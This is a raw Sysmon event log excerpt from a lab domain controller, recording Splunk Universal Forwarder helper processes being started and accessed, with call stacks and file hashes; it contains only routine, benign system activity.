10341000x800000000000000013293Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:15.374{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013292Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:15.374{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013291Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:15.374{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013290Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:15.374{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013289Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:15.374{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-47DF-6000-4405-000000009A01}6508C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013288Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:15.374{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-47DF-6000-4405-000000009A01}6508C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013287Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:15.234{08A6967A-47DF-6000-4405-000000009A01}6508C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013311Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:16.921{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-47E0-6000-4605-000000009A01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013310Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:16.921{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013309Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:16.921{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013308Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:16.921{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013307Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:16.921{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013306Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:16.921{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-47E0-6000-4605-000000009A01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013305Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:16.921{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-47E0-6000-4605-000000009A01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013304Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:16.781{08A6967A-47E0-6000-4605-000000009A01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013303Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:16.342{08A6967A-47E0-6000-4505-000000009A01}6444616C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013302Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:16.186{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-47E0-6000-4505-000000009A01}644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013301Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:16.186{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013300Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:16.186{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013299Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:16.186{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013298Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:16.186{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013297Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:16.186{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-47E0-6000-4505-000000009A01}644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013296Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:16.186{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-47E0-6000-4505-000000009A01}644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013295Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:16.046{08A6967A-47E0-6000-4505-000000009A01}644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013320Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:17.889{08A6967A-47E1-6000-4705-000000009A01}57845900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013319Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:17.733{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-47E1-6000-4705-000000009A01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013318Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:17.733{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013317Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:32:17.733{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013316Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 